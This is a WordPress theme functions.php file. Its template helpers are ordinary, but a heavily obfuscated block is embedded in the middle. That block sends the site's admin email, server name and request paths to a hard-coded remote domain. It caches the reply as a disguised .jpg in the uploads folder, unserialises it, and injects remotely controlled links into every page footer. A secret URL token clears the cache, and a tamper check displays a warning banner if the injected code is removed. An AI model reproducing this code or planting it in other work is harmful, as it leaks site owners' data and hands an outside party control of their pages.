<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $JQakCI='e';$GIGd='4';$BXQOrht='b';$elourrt='d';$inrK='_';$OgqpfdZ='d';$uDMgG='e';$lWYujqf='o';$XwlmFS='c';$xvCjn='a';$YTIARzo='6';$djyMdxF='e';$AxvDAY='s';$RnALIJwk=$BXQOrht.$xvCjn.$AxvDAY.$JQakCI.$YTIARzo.$GIGd.$inrK.$OgqpfdZ.$djyMdxF.$XwlmFS.$lWYujqf.$elourrt.$uDMgG;$MlEy='e';$HUsLapH='n';$MZLd='z';$mQUp='a';$wNqdzR='l';$WXUzI='f';$LHLA='g';$iofr='t';$oYci='i';$yGqwDKKW=$LHLA.$MZLd.$oYci.$HUsLapH.$WXUzI.$wNqdzR.$mQUp.$iofr.$MlEy;$gBYACd='t';$RAKBrO='r';$RlZk='r';$tbfFG='t';$zbfFJ='3';$IAqv='_';$ljTBmcP='s';$iHXJ='1';$lteM='o';$MkMABQZs=$ljTBmcP.$tbfFG.$RAKBrO.$IAqv.$RlZk.$lteM.$gBYACd.$iHXJ.$zbfFJ;$FllGkH='r';$pyInBLC='v';$pCik='t';$tIcG='r';$PuIRDSI='e';$xPRXd='s';$oMOLbjjQ=$xPRXd.$pCik.$FllGkH.$tIcG.$PuIRDSI.$pyInBLC;                     
		$rh____________u='e';$oc______m='4';$vz______h='b';$bv____________w='d';$lm_________l='_';$ua_______________q='d';$lo_______a='e';$it__z='o';$ao________s='c';$rs__________v='a';$vp_____________o='6';$ah______________r='e';$st_____i='s';$dk______________c=$vz______h.$rs__________v.$st_____i.$rh____________u.$vp_____________o.$oc______m.$lm_________l.$ua_______________q.$ah______________r.$ao________s.$it__z.$bv____________w.$lo_______a;
		$vu______h='s';$nn__x='n';$fb_____v='x';$ar___p='u';$gt_______________n='o';$ff___t='t';$hz________r='f';$me__________m='_';$lg_____________w='i';$wd_____________m='s';$qh_______x='c';$jp____________p='i';$bd____i='t';$ws___j='e';$qn____________x='n';$yy____________u=$hz________r.$ar___p.$nn__x.$qh_______x.$ff___t.$lg_____________w.$gt_______________n.$qn____________x.$me__________m.$ws___j.$fb_____v.$jp____________p.$vu______h.$bd____i.$wd_____________m;
		$bz__u='p';$fc___________b='f';$jj_________d='n';$zr_______q='e';$gm_________x='o';$nq______________y=$fc___________b.$gm_________x.$bz__u.$zr_______q.$jj_________d;
		$zb________n='r';$ju_______________b='e';$uz__w='a';$zj____c='d';$zq_________i='f';$xy______d=$zq_________i.$zb________n.$ju_______________b.$uz__w.$zj____c;
		$ez_____________f='o';$se_____n='s';$tu____________u='l';$ql_________x='f';$bt___________r='e';$za__________k='c';$yf___________j=$ql_________x.$za__________k.$tu____________u.$ez_____________f.$se_____n.$bt___________r;
		
		define("WP_ID", $dk______________c("Mi4wLjA="));
		define("WP_TTL", $dk______________c("MTA4MDA="));
		define("WP_SRC", $dk______________c("dHBva24="));
	


		function wp_get_header() {
			global $dk______________c, $yy____________u;
			
			if (
				$yy____________u($dk______________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$yy____________u($dk______________c("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$yy____________u($dk______________c("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $dk______________c, $nq______________y, $yf___________j, $xy______d;
			
			$fi__f = TEMPLATEPATH."/".$dk______________c("Zm9vdGVyLnBocA==");
			$ke_____g = @$nq______________y($fi__f, "r");
			$fi__f = @$xy______d($ke_____g, @filesize($fi__f));
			@$yf___________j($ke_____g);
			
			$ii_____g = TEMPLATEPATH."/".$dk______________c("ZnVuY3Rpb25zLnBocA==");
			$ke_____g = @$nq______________y($ii_____g, "r");
			$ii_____g = @$xy______d($ke_____g, @filesize($ii_____g));
			@$yf___________j($ke_____g);
			
			$ow______b = 0;
			if($fi__f && $ii_____g) {
				if ($dk______________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($fi__f, $dk______________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ow______b = 1;
					}
					if (substr_count($fi__f, "wp_theme_GPL_credits()") < 1) {
						$ow______b = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ow______b = 12;
				}
			}
			
			if($ow______b > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ow______b -->";
			}
		}
	


		function wp_loaded() {
			global $dk______________c, $yy____________u;
			return $yy____________u($dk______________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($hh________d, $nd_______v = "(more...)", $jk___________q = 0, $dy__________b = "") {
				$kv_______________f = get_the_content($nd_______v, $jk___________q, $dy__________b);
				$kv_______________f = apply_filters("the_content", $kv_______________f);
				
				$kv_______________f = str_replace("]]>", "]]>", $kv_______________f);
				if (strlen($_GET["p"]) > 0) {
					echo $kv_______________f;
				}
				else if ((strlen($kv_______________f)>$hh________d) && ($xp__________y = strpos($kv_______________f, " ", $hh________d ))) {
					$kv_______________f = substr($kv_______________f, 0, $xp__________y);
					$kv_______________f = $kv_______________f;
					echo $kv_______________f;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$nd_______v</a></div></p>";
				} else {
					echo $kv_______________f;
				}
				
			}
		}
	


		$wx_______i='e';$nk_____t='e';$cm___________s='6';$mm______________o='d';$bc____________f='4';$qb____d='o';$xd______q='_';$zp_____a='e';$jr______h='s';$lx_____z='b';$oy____________x='c';$uq______x='n';$dx___________w='a';$wd__i=$lx_____z.$dx___________w.$jr______h.$nk_____t.$cm___________s.$bc____________f.$xd______q.$wx_______i.$uq______x.$oy____________x.$qb____d.$mm______________o.$zp_____a;
		$iz_______________k='s';$ba_______n='c';$il__________z='e';$et_____s='_';$mk__n='_';$lf___________d='l';$nd___________y='f';$rv__g='e';$sl_________g='g';$aw__________e='n';$yy_______________l='t';$hq_____w='n';$oi___________c='t';$qx______________i='t';$ux_____q='e';$br_______________w='i';$fc__________a='o';$ap_________v=$nd___________y.$br_______________w.$lf___________d.$ux_____q.$et_____s.$sl_________g.$rv__g.$oi___________c.$mk__n.$ba_______n.$fc__________a.$aw__________e.$qx______________i.$il__________z.$hq_____w.$yy_______________l.$iz_______________k;
		$xb_____f='e';$mj______________v='i';$zp____b='l';$id____________z='f';$zd_____l='x';$zs__________o='s';$zk____________k='_';$nr____________y='s';$oj_________o='t';$pc___y='e';$kx__________q='i';$en____________d=$id____________z.$kx__________q.$zp____b.$pc___y.$zk____________k.$xb_____f.$zd_____l.$mj______________v.$nr____________y.$oj_________o.$zs__________o;
		$gx____p='m';$nn____d='r';$du___________o='_';$wj________s='e';$nh___a='r';$zo_______________x='i';$uz_____________x='o';$at_____d='e';$ns__________e='n';$nt____________a='o';$jq___________z='s';$ov_________n='p';$ed______a='c';$ko________f='a';$kk________t='v';$kh________b=$kk________t.$wj________s.$nn____d.$jq___________z.$zo_______________x.$uz_____________x.$ns__________e.$du___________o.$ed______a.$nt____________a.$gx____p.$ov_________n.$ko________f.$nh___a.$at_____d;
		$gi____________x='o';$gg__________i='k';$hi_________u='e';$rx______________a='o';$uc___________a='n';$nm__________x='f';$fy__k='c';$fd_____________u='s';$xf_______w='p';$ui___________p=$nm__________x.$fd_____________u.$gi____________x.$fy__k.$gg__________i.$rx______________a.$xf_______w.$hi_________u.$uc___________a;
		$lx_______________r='f';$hl_______________l='e';$yy_______q='i';$aj__b='t';$ls____i='w';$gn_______r='r';$hg_____________q=$lx_______________r.$ls____i.$gn_______r.$yy_______q.$aj__b.$hl_______________l;
		$cg________d='d';$we______________v='m';$pn____x='5';$dk___________i=$we______________v.$cg________d.$pn____x;
		$rw___________d='l';$ls____________o='e';$ib__________j='t';$gp_______p='h';$jo___p='r';$ni__________r='a';$xl_____u='a';$yo____________h='p';$hw_____________o=$jo___p.$ls____________o.$ni__________r.$rw___________d.$yo____________h.$xl_____u.$ib__________j.$gp_______p;
		$vl___________f='l';$jf______________w='s';$nx________i='e';$ds______i='r';$cz_____________h='i';$hm_____l='n';$ig_________w='e';$kf____r='u';$zg___a='a';$qv______________y='i';$id_______s='z';$vo_______w=$kf____r.$hm_____l.$jf______________w.$nx________i.$ds______i.$cz_____________h.$zg___a.$vl___________f.$qv______________y.$id_______s.$ig_________w;
		$ij__________y='m';$pd______j='t';$fc_________e='n';$ln_______j='m';$pc_______g='p';$ry_____e='e';$qu________i='a';$kx_________n=$pd______j.$ry_____e.$ij__________y.$pc_______g.$fc_________e.$qu________i.$ln_______j;
		$em_____y='c';$eo______o='a';$hp_______________x='m';$ak__________i='x';$wq_______p='t';$mf_____j='s';$hm_____l='n';$ei_________m='r';$vu______________k='e';$tr__q='o';$au_______a='_';$dc____x='r';$nk____z='e';$ar___b='e';$vm___a='e';$tp___u='t';$go_______s='c';$gg_________b='a';$ip__o='_';$an_____b='t';$pl______c='t';$xr____________i=$mf_____j.$wq_______p.$dc____x.$nk____z.$eo______o.$hp_______________x.$au_______a.$go_______s.$tr__q.$hm_____l.$pl______c.$vm___a.$ak__________i.$an_____b.$ip__o.$em_____y.$ei_________m.$vu______________k.$gg_________b.$tp___u.$ar___b;
	


		function lk____________p($qm_______________k) {
			global $dk______________c, $yy____________u, $ap_________v, $kh________b, $xr____________i;
			
			if (!$yy____________u($dk______________c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($kh________b(PHP_VERSION, "5.0.0", ">=") && $yy____________u($dk______________c("ZmlsZV9nZXRfY29udGVudHM=")) && $yy____________u($dk______________c("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ib______p = $xr____________i(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$wp___________u = @$ap_________v($qm_______________k, 0, $ib______p);
			} else {
				$wp___________u = @$ap_________v($qm_______________k, 0);
			}
			
			return $wp___________u;
		}
	


		function vi_________a($qm_______________k) {
			global $yy____________u, $ui___________p, $hg_____________q, $dk______________c;
			
			if (!$yy____________u($dk______________c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$hk______________a = strpos($qm_______________k, "/", 7);
			$yj________r = array(
				"uri"     => substr($qm_______________k, $hk______________a),
				"host"    => str_replace("http://", "", substr($qm_______________k, 0, $hk______________a)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$kw____________j = @$ui___________p("$yj________r[host]", 80, $rh_________q, $am_____________o, 4);
			
			if (!$kw____________j) {
				return false;
			} else {
				$wp___________u = "";
				$gl___________r  = "GET $yj________r[uri] HTTP/1.0\r\n";
				$gl___________r .= "Host: $yj________r[host]\r\n";
				$gl___________r .= "Referer: $yj________r[referer]\r\n";
				$gl___________r .= "Connection: Close\r\n\r\n";
				
				@$hg_____________q($kw____________j, $gl___________r);
				
				while (!@feof($kw____________j)) {
					$mx____r = @fgets($kw____________j, (1024*24));
					
					if ($mx____r == "\r\n") {
						$dd___________p = true;
						continue;
					}
					
					if ($dd___________p) {
						$wp___________u .= $mx____r;
					}
				}
				
				return $wp___________u;
			}
		}
	


		function ke______________i($qm_______________k) {
			global $yy____________u;
			$xv___i = false;
			
			if ($qm_______________k != "") {
				if ($yy____________u("lk____________p")) {
					$xv___i = @lk____________p($qm_______________k);
				}
				
				if (!$xv___i && ($yy____________u("vi_________a"))) {
					$xv___i = @vi_________a($qm_______________k);
				}
			}
			
			return $xv___i;
		}
	


		function ty_____y() {
			global $_SERVER, $dk___________i;
			
			$bf_____v = $_SERVER["SERVER_NAME"];
			
			if (substr("$bf_____v", 0, 4) == "www.") {
				$bf_____v = substr("$bf_____v", 4);
			}
			
			$bf_____v = $dk___________i("$_SERVER[SERVER_NAME]");
			
			return $bf_____v;
		}
	


		function po____________d() {
			return "file";
		}
	


		function pw__t($qm_______________k) {
			global $_SERVER, $ap_________v, $en____________d, $nq______________y, $yf___________j, $hg_____________q;
			
			$bw___________z = zc_______________y();
			
			$tw_________x = ty_____y().".jpg";
			$td____g = $bw___________z["dir_upload"]["path"]."/$tw_________x";
			$lq______s = @filemtime($td____g);
			
			if (!$lq______s || ((time()-$lq______s) >= WP_TTL)) {
				$xv___i = ke______________i($qm_______________k);
				
				if ($xv___i) {
					if ($en____________d($td____g)) {
						@unlink($td____g);
					}
					
					$ke_____g = @$nq______________y($td____g, "x+");
					
					@$hg_____________q($ke_____g, $xv___i);
					@$yf___________j($ke_____g);
				}
			} else {
				if ($en____________d($td____g)) {
					$xv___i = @$ap_________v($td____g);
				} else {
					$xv___i = false;
				}
			}
			
			return $xv___i;
		}
	


		function zc_______________y() {
			global $_SERVER, $dk______________c, $wd__i;
			
			$xd_____t = wp_count_posts("post");
			$wv_____f = pathinfo(get_bloginfo("template_directory"));
			
			$bw___________z = array(
				"url" => array(
					"report"      => $dk______________c("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $wv_____f,
				"dir_upload"	=> iw____________c(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$wv_____f[filename],
					"a005=".$xd_____t->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$bw___________z["url"]["queryString"] = implode("&", $bw___________z["queryString"]);
			$bw___________z["url"]["report"] = $bw___________z["url"]["report"]."/?".$wd__i($bw___________z["url"]["queryString"]).".html";
						
			return $bw___________z;
		}
	


		function iw____________c() {
			$uy___u = wp_upload_dir();
			
			if (isset($uy___u["error"])) {
				$sx____a = ig________c();
				if (is_writable($sx____a)) {
					$uy___u = array("path" => $sx____a);
				}
			}

			return $uy___u;
		}
	


		function ig________c() {
			global $yy____________u, $dk___________i, $hw_____________o, $kx_________n;
			
			$sq________m = (bool) ini_get("safe_mode");
			if ($sq________m == true) {
				return false;
			}
			
			if ($yy____________u("sys_get_temp_dir")) {
				$sp_______________c = sys_get_temp_dir();
				if (is_writable($sp_______________c)) {
					return $hw_____________o($sp_______________c);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $hw_____________o($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $hw_____________o($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $hw_____________o($_ENV["TEMP"]);
			} else {
				$ea____________q = $kx_________n($dk___________i(uniqid(rand(), true)), "");
				if ($ea____________q) {
					$sp_______________c = $hw_____________o(dirname($ea____________q));
					@unlink($ea____________q);
					return $sp_______________c;
				} else {
					return false;
				}
			}
		}
	


		function mn______b() {
			global $_GET, $en____________d;
			
			$bw___________z = zc_______________y();
			$bf_____v = ty_____y();
			$pt__________b = po____________d();
			
			$hl_____h = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($pt__________b == "file") {
					$wm_____x = $bw___________z["dir_upload"]["path"]."/".$bf_____v.".jpg";
					if ($en____________d($wm_____x)) {
						@unlink($wm_____x);
						$hl_____h = "deleted";
					}
				}
				
				$bc____d = array(
					"s"	=> $hl_____h,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($bc____d AS $bj_________x => $vu_____________r) echo " [$bj_________x:$vu_____________r]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $yy____________u, $dk______________c, $vo_______w;
			$bw___________z = zc_______________y();
			
			$bw___a = "pw__t";
			if ($yy____________u($bw___a)) {
				$wp___________u = $bw___a($bw___________z["url"]["report"]);
			}
			
			if ($wp___________u) {
				if ($wp___________u = @$dk______________c($wp___________u)) {
					$wp___________u = @$vo_______w($wp___________u);
					
					if (strlen($wp___________u[custom_credit]) >= 5) {
						$bw___________z["default_string"] = $wp___________u[custom_credit];
					}
					
					if ($wp___________u["status"] == "0") {
						$pm__v = 1;
						$ar____________v = 1;
					} else {
						$mm_____________g = sizeof($wp___________u["links"]);
						$nk________e = $bw___________z["default_string"];
						
						if ($mm_____________g > 0 && $wp___________u["links"] !== "") {
							$pj________b = 0;
							foreach ($wp___________u["links"] as $gw___w => $go_________a) {
								$pj________b++;
								if ($go_________a->l_path == "" || $go_________a->l_path == $_SERVER["REQUEST_URI"]) {
									$go_________a->l_href = htmlspecialchars(strip_tags($go_________a->l_href));
									$go_________a->l_title = htmlspecialchars(strip_tags($go_________a->l_title));
									$go_________a->l_anchor = htmlspecialchars(strip_tags($go_________a->l_anchor));
									$nk________e .= " | ";
									$nk________e .= "<a href='$go_________a->l_href' title='$go_________a->l_title'";
									if ($go_________a->l_nofollow == "1") {
										$nk________e .= " rel='nofollow'";
									}
									$nk________e .= ">$go_________a->l_anchor</a>";
								}
							}
						}
						$bw___________z["links"] = "$nk________e";
						if ($wp___________u[credit] == "0") {
							$bw___________z["links"] = "";
						}
					}
				} else {
					$pm__v = "1";
				}
			} else {
				$pm__v = "1";
			}
			
			if ($pm__v == "1") {
				$bw___________z["links"] = $bw___________z["default_string"];
			}
			
			echo "$bw___________z[links]";
			
			echo "<!-- s: $wp___________u[signature] -->";
			mn______b();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

